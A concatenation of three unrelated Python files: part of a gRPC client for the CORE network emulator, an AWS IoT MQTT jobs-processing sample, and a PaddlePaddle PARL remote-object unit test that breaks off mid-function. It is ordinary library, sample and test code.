Listen for stream events and provide them to the handler.
:param stream: grpc stream that will provide events
:param handler: function that handles an event
:return: nothing
"""
try:
for event in stream:
handler(event)
except grpc.RpcError as e:
if e.code() == grpc.StatusCode.CANCELLED:
logging.debug("stream closed")
else:
logging.exception("stream error")
def start_streamer(stream, handler):
"""
Convenience method for starting a grpc stream thread for handling streamed events.
:param stream: grpc stream that will provide events
:param handler: function that handles an event
:return: nothing
"""
thread = threading.Thread(target=stream_listener, args=(stream, handler))
thread.daemon = True
thread.start()
class CoreGrpcClient(object):
"""
Provides convenience methods for interfacing with the CORE grpc server.
"""
def __init__(self, address="localhost:50051"):
"""
Creates a CoreGrpcClient instance.
:param str address: grpc server address to connect to
"""
self.address = address
self.stub = None
self.channel = None
def create_session(self, session_id=None):
"""
Create a session.
:param int session_id: id for session, default is None and one will be created for you
:return: response with created session id
:rtype: core_pb2.CreateSessionResponse
"""
request = core_pb2.CreateSessionRequest(session_id=session_id)
return self.stub.CreateSession(request)
def delete_session(self, session_id):
"""
Delete a session.
:param int session_id: id of session
:return: response with result of deletion success or failure
:rtype: core_pb2.DeleteSessionResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteSessionRequest(session_id=session_id)
return self.stub.DeleteSession(request)
def get_sessions(self):
"""
Retrieves all currently known sessions.
:return: response with a list of currently known session, their state and number of nodes
:rtype: core_pb2.GetSessionsResponse
"""
return self.stub.GetSessions(core_pb2.GetSessionsRequest())
def get_session(self, session_id):
"""
Retrieve a session.
:param int session_id: id of session
:return: response with sessions state, nodes, and links
:rtype: core_pb2.GetSessionResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionRequest(session_id=session_id)
return self.stub.GetSession(request)
def get_session_options(self, session_id):
"""
Retrieve session options.
:param int session_id: id of session
:return: response with a list of configuration groups
:rtype: core_pb2.GetSessionOptionsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionOptionsRequest(session_id=session_id)
return self.stub.GetSessionOptions(request)
def set_session_options(self, session_id, config):
"""
Set options for a session.
:param int session_id: id of session
:param dict[str, str] config: configuration values to set
:return: response with result of success or failure
:rtype: core_pb2.SetSessionOptionsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionOptionsRequest(session_id=session_id, config=config)
return self.stub.SetSessionOptions(request)
def get_session_location(self, session_id):
"""
Get session location.
:param int session_id: id of session
:return: response with session position reference and scale
:rtype: core_pb2.GetSessionLocationResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionLocationRequest(session_id=session_id)
return self.stub.GetSessionLocation(request)
def set_session_location(self, session_id, x=None, y=None, z=None, lat=None, lon=None, alt=None, scale=None):
"""
Set session location.
:param int session_id: id of session
:param float x: x position
:param float y: y position
:param float z: z position
:param float lat: latitude position
:param float lon: longitude position
:param float alt: altitude position
:param float scale: geo scale
:return: response with result of success or failure
:rtype: core_pb2.SetSessionLocationResponse
:raises grpc.RpcError: when session doesn't exist
"""
position = core_pb2.SessionPosition(x=x, y=y, z=z, lat=lat, lon=lon, alt=alt)
request = core_pb2.SetSessionLocationRequest(session_id=session_id, position=position, scale=scale)
return self.stub.SetSessionLocation(request)
def set_session_state(self, session_id, state):
"""
Set session state.
:param int session_id: id of session
:param core_pb2.SessionState state: session state to transition to
:return: response with result of success or failure
:rtype: core_pb2.SetSessionStateResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionStateRequest(session_id=session_id, state=state)
return self.stub.SetSessionState(request)
def events(self, session_id, handler):
"""
Listen for session events.
:param int session_id: id of session
:param handler: handler for every event
:return: nothing
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.EventsRequest(session_id=session_id)
stream = self.stub.Events(request)
start_streamer(stream, handler)
def throughputs(self, handler):
"""
Listen for throughput events with information for interfaces and bridges.
:param handler: handler for every event
:return: nothing
"""
request = core_pb2.ThroughputsRequest()
stream = self.stub.Throughputs(request)
start_streamer(stream, handler)
def add_node(self, session_id, node):
"""
Add node to session.
:param int session_id: session id
:param core_pb2.Node node: node to add
:return: response with node id
:rtype: core_pb2.AddNodeResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.AddNodeRequest(session_id=session_id, node=node)
return self.stub.AddNode(request)
def get_node(self, session_id, node_id):
"""
Get node details.
:param int session_id: session id
:param int node_id: node id
:return: response with node details
:rtype: core_pb2.GetNodeResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNode(request)
def edit_node(self, session_id, node_id, position):
"""
Edit a node, currently only changes position.
:param int session_id: session id
:param int node_id: node id
:param core_pb2.Position position: position to set node to
:return: response with result of success or failure
:rtype: core_pb2.EditNodeResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.EditNodeRequest(session_id=session_id, node_id=node_id, position=position)
return self.stub.EditNode(request)
def delete_node(self, session_id, node_id):
"""
Delete node from session.
:param int session_id: session id
:param int node_id: node id
:return: response with result of success or failure
:rtype: core_pb2.DeleteNodeResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteNodeRequest(session_id=session_id, node_id=node_id)
return self.stub.DeleteNode(request)
def node_command(self, session_id, node_id, command):
"""
Send command to a node and get the output.
:param int session_id: session id
:param int node_id: node id
:return: response with command combined stdout/stderr
:rtype: core_pb2.NodeCommandResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.NodeCommandRequest(session_id=session_id, node_id=node_id, command=command)
return self.stub.NodeCommand(request)
def get_node_terminal(self, session_id, node_id):
"""
Retrieve terminal command string for launching a local terminal.
:param int session_id: session id
:param int node_id: node id
:return: response with a node terminal command
:rtype: core_pb2.GetNodeTerminalResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeTerminalRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNodeTerminal(request)
def get_node_links(self, session_id, node_id):
"""
Get current links for a node.
:param int session_id: session id
:param int node_id: node id
:return: response with a list of links
:rtype: core_pb2.GetNodeLinksResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeLinksRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNodeLinks(request)
def add_link(self, session_id, node_one_id, node_two_id, interface_one=None, interface_two=None, options=None):
"""
Add a link between nodes.
:param int session_id: session id
:param int node_one_id: node one id
:param int node_two_id: node two id
:param core_pb2.Interface interface_one: node one interface data
:param core_pb2.Interface interface_two: node two interface data
:param core_pb2.LinkOptions options: options for link (jitter, bandwidth, etc)
:return: response with result of success or failure
:rtype: core_pb2.AddLinkResponse
:raises grpc.RpcError: when session or one of the nodes don't exist
"""
link = core_pb2.Link(
node_one_id=node_one_id, node_two_id=node_two_id, type=core_pb2.LinkType.WIRED,
interface_one=interface_one, interface_two=interface_two, options=options)
request = core_pb2.AddLinkRequest(session_id=session_id, link=link)
return self.stub.AddLink(request)
def edit_link(self, session_id, node_one_id, node_two_id, options, interface_one_id=None, interface_two_id=None):
"""
Edit a link between nodes.
:param int session_id: session id
:param int node_one_id: node one id
:param int node_two_id: node two id
:param core_pb2.LinkOptions options: options for link (jitter, bandwidth, etc)
:param int interface_one_id: node one interface id
:param int interface_two_id: node two interface id
:return: response with result of success or failure
:rtype: core_pb2.EditLinkResponse
:raises grpc.RpcError: when session or one of the nodes don't exist
"""
request = core_pb2.EditLinkRequest(
session_id=session_id, node_one_id=node_one_id, node_two_id=node_two_id, options=options,
interface_one_id=interface_one_id, interface_two_id=interface_two_id)
return self.stub.EditLink(request)
def delete_link(self, session_id, node_one_id, node_two_id, interface_one_id=None, interface_two_id=None):
"""
Delete a link between nodes.
:param int session_id: session id
:param int node_one_id: node one id
:param int node_two_id: node two id
:param int interface_one_id: node one interface id
:param int interface_two_id: node two interface id
:return: response with result of success or failure
:rtype: core_pb2.DeleteLinkResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteLinkRequest(
session_id=session_id, node_one_id=node_one_id, node_two_id=node_two_id,
interface_one_id=interface_one_id, interface_two_id=interface_two_id)
return self.stub.DeleteLink(request)
def get_hooks(self, session_id):
"""
Get all hook scripts.
:param int session_id: session id
:return: response with a list of hooks
:rtype: core_pb2.GetHooksResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetHooksRequest(session_id=session_id)
return self.stub.GetHooks(request)
def add_hook(self, session_id, state, file_name, file_data):
"""
Add hook scripts.
:param int session_id: session id
:param core_pb2.SessionState state: state to trigger hook
:param str file_name: name of file for hook script
:param bytes file_data: hook script contents
:return: response with result of success or failure
:rtype: core_pb2.AddHookResponse
:raises grpc.RpcError: when session doesn't exist
"""
hook = core_pb2.Hook(state=state, file=file_name, data=file_data)
request = core_pb2.AddHookRequest(session_id=session_id, hook=hook)
return self.stub.AddHook(request)
def get_mobility_configs(self, session_id):
"""
Get all mobility configurations.
:param int session_id: session id
:return: response with a dict of node ids to mobility configurations
:rtype: core_pb2.GetMobilityConfigsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetMobilityConfigsRequest(session_id=session_id)
return self.stub.GetMobilityConfigs(request)
def get_mobility_config(self, session_id, node_id):
"""
Get mobility configuration for a node.
:param int session_id: session id
:param int node_id: node id
:return: response with a list of configuration groups
:rtype: core_pb2.GetMobilityConfigResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetMobilityConfigRequest(session_id=session_id, node_id=node_id)
return self.stub.GetMobilityConfig(request)
def set_mobility_config(self, session_id, node_id, config):
"""
Set mobility configuration for a node.
:param int session_id: session id
:param int node_id: node id
:param dict[str, str] config: mobility configuration
:return: response with result of success or failure
:rtype: core_pb2.SetMobilityConfigResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.SetMobilityConfigRequest(session_id=session_id, node_id=node_id, config=config)
return self.stub.SetMobilityConfig(request)
def mobility_action(self, session_id, node_id, action):
"""
Send a mobility action for a node.
:param int session_id: session id
:param int node_id: node id
:param core_pb2.ServiceAction action: action to take
:return: response with result of success or failure
:rtype: core_pb2.MobilityActionResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.MobilityActionRequest(session_id=session_id, node_id=node_id, action=action)
return self.stub.MobilityAction(request)
def get_services(self):
"""
Get all currently loaded services.
:return: response with a list of services
:rtype: core_pb2.GetServicesResponse
"""
request = core_pb2.GetServicesRequest()
return self.stub.GetServices(request)
def get_service_defaults(self, session_id):
"""
Get default services for different default node models.
:param int session_id: session id
:return: response with a dict of node model to a list of services
:rtype: core_pb2.GetServiceDefaultsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetServiceDefaultsRequest(session_id=session_id)
return self.stub.GetServiceDefaults(request)
def set_service_defaults(self, session_id, service_defaults):
"""
Set default services for node models.
:param int session_id: session id
:param dict service_defaults: node models to lists of services
:return: response with result of success or failure
:rtype: core_pb2.SetServiceDefaultsResponse
:raises grpc.RpcError: when session doesn't exist
"""
defaults = []
for node_type in service_defaults:
services = service_defaults[node_type]
default = core_pb2.ServiceDefaults(node_type=node_type, services=services)
defaults.append(default)
request = core_pb2.SetServiceDefaultsRequest(session_id=session_id, defaults=defaults)
return self.stub.SetServiceDefaults(request)
def get_node_service(self, session_id, node_id, service):
"""
Get service data for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:return: response with node service data
:rtype: core_pb2.GetNodeServiceResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeServiceRequest(session_id=session_id, node_id=node_id, service=service)
return self.stub.GetNodeService(request)
def get_node_service_file(self, session_id, node_id, service, file_name):
"""
Get a service file for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:param str file_name: file name to get data for
:return: response with file data
:rtype: core_pb2.GetNodeServiceFileResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeServiceFileRequest(
session_id=session_id, node_id=node_id, service=service, file=file_name)
return self.stub.GetNodeServiceFile(request)
def set_node_service(self, session_id, node_id, service, startup, validate, shutdown):
"""
Set service data for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:param list startup: startup commands
:param list validate: validation commands
:param list shutdown: shutdown commands
:return: response with result of success or failure
:rtype: core_pb2.SetNodeServiceResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.SetNodeServiceRequest(
session_id=session_id, node_id=node_id, service=service, startup=startup, validate=validate,
shutdown=shutdown)
return self.stub.SetNodeService(request)
def set_node_service_file(self, session_id, node_id, service, file_name, data):
"""
Set a service file for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:param str file_name: file name to save
:param bytes data: data to save for file
:return: response with result of success or failure
:rtype: core_pb2.SetNodeServiceFileResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.SetNodeServiceFileRequest(
session_id=session_id, node_id=node_id, service=service, file=file_name, data=data)
return self.stub.SetNodeServiceFile(request)
def service_action(self, session_id, node_id, service, action):
"""
Send an action to a service for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:param core_pb2.ServiceAction action: action for service (start, stop, restart, validate)
:return: response with result of success or failure
:rtype: core_pb2.ServiceActionResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.ServiceActionRequest(session_id=session_id, node_id=node_id, service=service, action=action)
return self.stub.ServiceAction(request)
def get_wlan_config(self, session_id, node_id):
"""
Get wlan configuration for a node.
:param int session_id: session id
:param int node_id: node id
:return: response with a list of configuration groups
:rtype: core_pb2.GetWlanConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetWlanConfigRequest(session_id=session_id, node_id=node_id)
return self.stub.GetWlanConfig(request)
def set_wlan_config(self, session_id, node_id, config):
"""
Set wlan configuration for a node.
:param int session_id: session id
:param int node_id: node id
:param dict[str, str] config: wlan configuration
:return: response with result of success or failure
:rtype: core_pb2.SetWlanConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetWlanConfigRequest(session_id=session_id, node_id=node_id, config=config)
return self.stub.SetWlanConfig(request)
def get_emane_config(self, session_id):
"""
Get session emane configuration.
:param int session_id: session id
:return: response with a list of configuration groups
:rtype: core_pb2.GetEmaneConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetEmaneConfigRequest(session_id=session_id)
return self.stub.GetEmaneConfig(request)
def set_emane_config(self, session_id, config):
"""
Set session emane configuration.
:param int session_id: session id
:param dict[str, str] config: emane configuration
:return: response with result of success or failure
:rtype: core_pb2.SetEmaneConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetEmaneConfigRequest(session_id=session_id, config=config)
return self.stub.SetEmaneConfig(request)
def get_emane_models(self, session_id):
"""
Get session emane models.
:param int session_id: session id
:return: response with a list of emane models
:rtype: core_pb2.GetEmaneModelsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetEmaneModelsRequest(session_id=session_id)
return self.stub.GetEmaneModels(request)
def get_emane_model_config(self, session_id, node_id, model, interface_id=-1):
"""
Get emane model configuration for a node or a node's interface.
:param int session_id: session id
:param int node_id: node id
:param str model: emane model name
:param int interface_id: node interface id
:return: response with a list of configuration groups
:rtype: core_pb2.GetEmaneModelConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetEmaneModelConfigRequest(
session_id=session_id, node_id=node_id, model=model, interface=interface_id)
return self.stub.GetEmaneModelConfig(request)
def set_emane_model_config(self, session_id, node_id, model, config, interface_id=-1):
"""
Set emane model configuration for a node or a node's interface.
:param int session_id: session id
:param int node_id: node id
:param str model: emane model name
:param dict[str, str] config: emane model configuration
:param int interface_id: node interface id
:return: response with result of success or failure
:rtype: core_pb2.SetEmaneModelConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetEmaneModelConfigRequest(
session_id=session_id, node_id=node_id, model=model, config=config, interface_id=interface_id)
return self.stub.SetEmaneModelConfig(request)
def get_emane_model_configs(self, session_id):
"""
Get all emane model configurations for a session.
:param int session_id: session id
:return: response with a dictionary of node/interface ids to configurations
:rtype: core_pb2.GetEmaneModelConfigsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetEmaneModelConfigsRequest(session_id=session_id)
return self.stub.GetEmaneModelConfigs(request)
def save_xml(self, session_id, file_path):
"""
Save the current scenario to an XML file.
:param int session_id: session id
:param str file_path: local path to save scenario XML file to
:return: nothing
"""
request = core_pb2.SaveXmlRequest(session_id=session_id)
response = self.stub.SaveXml(request)
with open(file_path, "w") as xml_file:
xml_file.write(response.data)
def open_xml(self, file_path):
"""
Load a local scenario XML file to open as a new session.
:param str file_path: path of scenario XML file
:return: response with opened session id
:rtype: core_pb2.OpenXmlResponse
"""
with open(file_path, "r") as xml_file:
data = xml_file.read()
request = core_pb2.OpenXmlRequest(data=data)
return self.stub.OpenXml(request)
def connect(self):
"""
Open connection to server, must be closed manually.
:return: nothing
"""
self.channel = grpc.insecure_channel(self.address)
self.stub = core_pb2_grpc.CoreApiStub(self.channel)
def close(self):
"""
Close currently opened server channel connection.
:return: nothing
"""
if self.channel:
self.channel.close()
self.channel = None
@contextmanager
def context_connect(self):
"""
Makes a context manager based connection to the server, will close after context ends.
:return: nothing
"""
try:
self.connect()
yield
finally:
self.close()
|
jobsSample.py
|
'''
/*
* Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
'''
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTThingJobsClient
from AWSIoTPythonSDK.core.jobs.thingJobManager import jobExecutionTopicType
from AWSIoTPythonSDK.core.jobs.thingJobManager import jobExecutionTopicReplyType
from AWSIoTPythonSDK.core.jobs.thingJobManager import jobExecutionStatus
import threading
import logging
import time
import datetime
import argparse
import json
class JobsMessageProcessor(object):
def __init__(self, awsIoTMQTTThingJobsClient, clientToken):
#keep track of this to correlate request/responses
self.clientToken = clientToken
self.awsIoTMQTTThingJobsClient = awsIoTMQTTThingJobsClient
self.done = False
self.jobsStarted = 0
self.jobsSucceeded = 0
self.jobsRejected = 0
self._setupCallbacks(self.awsIoTMQTTThingJobsClient)
def _setupCallbacks(self, awsIoTMQTTThingJobsClient):
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.newJobReceived, jobExecutionTopicType.JOB_NOTIFY_NEXT_TOPIC)
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.startNextJobSuccessfullyInProgress, jobExecutionTopicType.JOB_START_NEXT_TOPIC, jobExecutionTopicReplyType.JOB_ACCEPTED_REPLY_TYPE)
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.startNextRejected, jobExecutionTopicType.JOB_START_NEXT_TOPIC, jobExecutionTopicReplyType.JOB_REJECTED_REPLY_TYPE)
# '+' indicates a wildcard for jobId in the following subscriptions
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.updateJobSuccessful, jobExecutionTopicType.JOB_UPDATE_TOPIC, jobExecutionTopicReplyType.JOB_ACCEPTED_REPLY_TYPE, '+')
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.updateJobRejected, jobExecutionTopicType.JOB_UPDATE_TOPIC, jobExecutionTopicReplyType.JOB_REJECTED_REPLY_TYPE, '+')
#call back on successful job updates
def startNextJobSuccessfullyInProgress(self, client, userdata, message):
payload = json.loads(message.payload.decode('utf-8'))
if 'execution' in payload:
self.jobsStarted += 1
execution = payload['execution']
self.executeJob(execution)
statusDetails = {'HandledBy': 'ClientToken: {}'.format(self.clientToken)}
threading.Thread(target = self.awsIoTMQTTThingJobsClient.sendJobsUpdate, kwargs = {'jobId': execution['jobId'], 'status': jobExecutionStatus.JOB_EXECUTION_SUCCEEDED, 'statusDetails': statusDetails, 'expectedVersion': execution['versionNumber'], 'executionNumber': execution['executionNumber']}).start()
else:
print('Start next saw no execution: ' + message.payload.decode('utf-8'))
self.done = True
def executeJob(self, execution):
print('Executing job ID, version, number: {}, {}, {}'.format(execution['jobId'], execution['versionNumber'], execution['executionNumber']))
print('With jobDocument: ' + json.dumps(execution['jobDocument']))
def newJobReceived(self, client, userdata, message):
payload = json.loads(message.payload.decode('utf-8'))
if 'execution' in payload:
self._attemptStartNextJob()
else:
print('Notify next saw no execution')
self.done = True
def processJobs(self):
self.done = False
self._attemptStartNextJob()
def startNextRejected(self, client, userdata, message):
print('Start next rejected:' + message.payload.decode('utf-8'))
self.jobsRejected += 1
def updateJobSuccessful(self, client, userdata, message):
self.jobsSucceeded += 1
def updateJobRejected(self, client, userdata, message):
self.jobsRejected += 1
def _attemptStartNextJob(self):
statusDetails = {'StartedBy': 'ClientToken: {} on {}'.format(self.clientToken, datetime.datetime.now().isoformat())}
threading.Thread(target=self.awsIoTMQTTThingJobsClient.sendJobsStartNext, kwargs = {'statusDetails': statusDetails}).start()
def isDone(self):
return self.done
def getStats(self):
stats = {}
stats['jobsStarted'] = self.jobsStarted
stats['jobsSucceeded'] = self.jobsSucceeded
stats['jobsRejected'] = self.jobsRejected
return stats
# Read in command-line parameters
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--thingName", action="store", dest="thingName", help="Your AWS IoT ThingName to process jobs for")
parser.add_argument("-e", "--endpoint", action="store", required=True, dest="host", help="Your AWS IoT custom endpoint")
parser.add_argument("-r", "--rootCA", action="store", required=True, dest="rootCAPath", help="Root CA file path")
parser.add_argument("-c", "--cert", action="store", dest="certificatePath", help="Certificate file path")
parser.add_argument("-k", "--key", action="store", dest="privateKeyPath", help="Private key file path")
parser.add_argument("-p", "--port", action="store", dest="port", type=int, help="Port number override")
parser.add_argument("-w", "--websocket", action="store_true", dest="useWebsocket", default=False,
help="Use MQTT over WebSocket")
parser.add_argument("-id", "--clientId", action="store", dest="clientId", default="basicJobsSampleClient",
help="Targeted client id")
args = parser.parse_args()
host = args.host
rootCAPath = args.rootCAPath
certificatePath = args.certificatePath
privateKeyPath = args.privateKeyPath
port = args.port
useWebsocket = args.useWebsocket
clientId = args.clientId
thingName = args.thingName
if args.useWebsocket and args.certificatePath and args.privateKeyPath:
parser.error("X.509 cert authentication and WebSocket are mutual exclusive. Please pick one.")
exit(2)
if not args.useWebsocket and (not args.certificatePath or not args.privateKeyPath):
parser.error("Missing credentials for authentication.")
exit(2)
# Port defaults
if args.useWebsocket and not args.port: # When no port override for WebSocket, default to 443
port = 443
if not args.useWebsocket and not args.port: # When no port override for non-WebSocket, default to 8883
port = 8883
# Configure logging
logger = logging.getLogger("AWSIoTPythonSDK.core")
logger.setLevel(logging.DEBUG)
streamHandler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
streamHandler.setFormatter(formatter)
logger.addHandler(streamHandler)
# Init AWSIoTMQTTClient
myAWSIoTMQTTClient = None
if useWebsocket:
myAWSIoTMQTTClient = AWSIoTMQTTClient(clientId, useWebsocket=True)
myAWSIoTMQTTClient.configureEndpoint(host, port)
myAWSIoTMQTTClient.configureCredentials(rootCAPath)
else:
myAWSIoTMQTTClient = AWSIoTMQTTClient(clientId)
myAWSIoTMQTTClient.configureEndpoint(host, port)
myAWSIoTMQTTClient.configureCredentials(rootCAPath, privateKeyPath, certificatePath)
# AWSIoTMQTTClient connection configuration
myAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)
myAWSIoTMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec
myAWSIoTMQTTClient.configureMQTTOperationTimeout(10) # 5 sec
jobsClient = AWSIoTMQTTThingJobsClient(clientId, thingName, QoS=1, awsIoTMQTTClient=myAWSIoTMQTTClient)
print('Connecting to MQTT server and setting up callbacks...')
jobsClient.connect()
jobsMsgProc = JobsMessageProcessor(jobsClient, clientId)
print('Starting to process jobs...')
jobsMsgProc.processJobs()
while not jobsMsgProc.isDone():
time.sleep(2)
print('Done processing jobs')
print('Stats: ' + json.dumps(jobsMsgProc.getStats()))
jobsClient.disconnect()
|
remote_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import parl
import threading
import unittest
from parl.remote import *
class UnableSerializeObject(object):
def __init__(self):
# threading.Lock() can not be serialized
self.lock = threading.Lock()
@parl.remote_class
class Simulator:
def __init__(self, arg1, arg2=None):
self.arg1 = arg1
self.arg2 = arg2
def get_arg1(self):
return self.arg1
def get_arg2(self):
return self.arg2
def set_arg1(self, value):
self.arg1 = value
def set_arg2(self, value):
self.arg2 = value
def get_unable_serialize_object(self):
return UnableSerializeObject()
def add_one(self, value):
value += 1
return value
def will_raise_exeception_func(self):
x = 1 / 0
class TestRemote(unittest.TestCase):
def _setUp(self, server_port):
self.sim = Simulator(1, arg2=2)
# run client in a new thread to fake a remote client
self.client_thread = threading.Thread(
target=self.sim.as_remote, args=(
'localhost',
server_port,
))
self.client_thread.setDaemon(True)
self.client_thread.start()
self.remote_manager = RemoteManager(port=server_port)
def test_remote_object(self):
server_port = 17770
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
self.assertEqual(remote_sim.get_arg1(), 1)
self.assertEqual(remote_sim.get_arg2(), 2)
ret = remote_sim.set_arg1(3)
self.assertIsNone(ret)
ret = remote_sim.set_arg2(4)
self.assertIsNone(ret)
self.assertEqual(remote_sim.get_arg1(), 3)
self.assertEqual(remote_sim.get_arg2(), 4)
def test_remote_object_with_wrong_getattr_get_variable(self):
server_port = 17771
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.get_arg3()
except RemoteAttributeError as e:
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def test_remote_object_with_wrong_getattr_set_variable(self):
server_port = 17772
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.set_arg3(3)
except RemoteAttributeError as e:
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def test_remote_object_with_wrong_argument(self):
server_port = 17773
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.set_arg1(wrong_arg=1)
except RemoteError as e:
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def test_remote_object_with_unable_serialize_argument(self):
server_port = 17774
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.set_arg1(UnableSerializeObject())
except SerializeError as e:
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def test_remote_object_with_unable_serialize_return(self):
server_port = 17775
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.get_unable_serialize_object()
except RemoteSerializeError as e:
# expected
logger.info('Expected exception: {}'.format(e))
return
assert False
def test_multi_remote_object(self):
server_port = 17776
self._setUp(server_port)
time.sleep(1)
# run second client
sim2 = Simulator(11, arg2=22)
client_thread2 = threading.Thread(
target=sim2.as_remote, args=(
'localhost',
server_port,
))
client_thread2.setDaemon(True)
client_thread2.start()
time.sleep(1)
remote_sim1 = self.remote_manager.get_remote()
remote_sim2 = self.remote_manager.get_remote()
self.assertEqual(remote_sim1.get_arg1(), 1)
self.assertEqual(remote_sim2.get_arg1(), 11)
def test_multi_remote_object_with_one_failed(self):
server_port = 17777
self._setUp(server_port)
time.sleep(1)
# run second client
sim2 = Simulator(11, arg2=22)
client_thread2 = threading.Thread(
target=sim2.as_remote, args=(
'localhost',
server_port,
))
client_thread2.setDaemon(True)
client_thread2.start()
time.sleep(1)
remote_sim1 = self.remote_manager.get_remote()
remote_sim2 = self.remote_manager.get_remote()
try:
# make remote sim1 failed
remote_sim1.get_arg3()
except:
pass
self.assertEqual(remote_sim2.get_arg1(), 11)
# Todo(@zenghongsheng):
# zmq will raise unexpected C++ exception when closing context,
# remove this unittest for now.
#def test_heartbeat_after_server_closed(self):
# server_port = 17778
# self._setUp(server_port)
# remote_sim = self.remote_manager.get_remote()
# time.sleep(1)
# self.remote_manager.close()
# # heartbeat interval (10s) + max waiting reply (10s)
# time.sleep(20)
# logger.info('check self.sim.remote_closed')
# self.assertTrue(self.sim.remote_closed())
def test_set_client_ip_port_manually(self):
server_port = 17779
self._setUp(server_port)
time.sleep(1)
# run second client
sim2 = Simulator(11, arg2=22)
client_thread2 = threading.Thread(
target=sim2.as_remote,
args=(
'localhost',
server_port,
'localhost',
6666,
))
client_thread2.setDaemon(True)
client_thread2.start()
time.sleep(1)
remote_sim1 = self.remote_manager.get_remote()
remote_sim2 = self.remote_manager.get_remote()
self.assertEqual(remote_sim1.get_arg1(), 1)
self.assertEqual(remote_sim2.get_arg1(), 11)
def test_thread_safe_of_remote_module(self):
server_port = 17780
self._setUp(server_port)
time.sleep(1)
thread_num = 10
for _ in range(thread_num):
# run clients in backend
sim = Simulator(11, arg2=22)
client_thread = threading.Thread(
target=sim.as_remote, args=(
'localhost',
server_port,
))
client_thread.setDaemon(True)
client_thread.start()
time.sleep(1)
threads = []
for _ in range(thread_num):
remote_sim = self.remote_manager.get_remote()
